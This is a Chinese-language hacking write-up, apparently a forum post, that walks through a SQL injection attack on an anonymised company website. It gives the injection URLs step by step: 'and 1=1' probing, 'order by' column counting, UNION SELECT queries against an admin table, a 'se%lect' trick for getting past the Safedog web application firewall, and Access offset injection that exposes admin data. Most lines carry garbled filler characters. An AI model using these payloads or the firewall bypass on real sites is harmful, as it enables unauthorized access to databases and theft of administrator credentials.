打开网站,一个企业站。
9 Y! |8 |& q/ J2 L9 d# e: @' P. y8 K+ Y3 \' i4 k
- O' i: R& q% b' x* B
顺手加个admin0 H1 K0 H1 p# p r3 }
: M6 C* z ^- }. i7 F
/ l3 d B4 ^4 Q; l7 P
默认后台。3 c. [- P. [( F' U% w6 m
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。8 _2 k1 U& K: | r( C y& {
4 p' J! J- O: V3 o% z
) Q" M, [5 O/ }7 w6 u- w4 c8 _# z. ^( N6 x, L8 a
所以就不用御剑扫了,待会直接封IP。3 R! o) Y9 k/ k+ @
2 v/ m2 [% ?3 C- o用order by语句判断是否存在注入。0 ~3 I# A* F2 N/ Y9 k
http://www.xxx.com /product_show.asp?id=997 order by 1
0 ~" g4 g3 ?/ ^6 R" [8 k7 W" H8 {http://www.xxx.com /product_show.asp?id=997 order by 100
3 Z# Q' J2 U) y% z. L现在存在注入,经测试后发现是9个字段。2 c2 \' d" Q4 i1 x
' C2 Y6 m1 Y- h
接下来进行联合查询,猜是否存在admin表。
4 s% p5 U: v: ~7 C3 w% \; Chttp://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
5 _8 C. {5 N9 V6 x) o# m. U
1 L# g7 k# D9 o/ f+ d( ]0 h( @+ X1 U
- r( w! Y: W0 h% ]0 U" H7 e; ?3 r9 V# j) E; b% o
在select中间加个%,se%lect绕过安全狗。
9 f* z& t% ?+ w1 I) {) h
) R2 m+ v& }9 e( m8 X# j- u( ~' W* U7 t. j/ Z8 H2 z( k0 c2 s
发现存在admin表,然后开始手工猜常用的字段。1 F; o) a( q0 B. P
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
& W( ~5 W" X0 u7 i" u' D % e' h7 u7 o. B" \* J
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
3 w. G& m% h2 s9 j/ ? , T+ @4 W8 Q4 `# s& ~
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
0 @, O3 F, J& G: t3 {+ ~5 S/ _( yhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
0 F( o; ]( h! {* h; U! r* ?( r好了,敏感内容出显了。$ {* ?* x4 D* L
' w3 b7 G! x; R5 a) z& K: Y7 s0 m: e% c8 y# p
* a" [* ?) ~! ]8 k0 [ |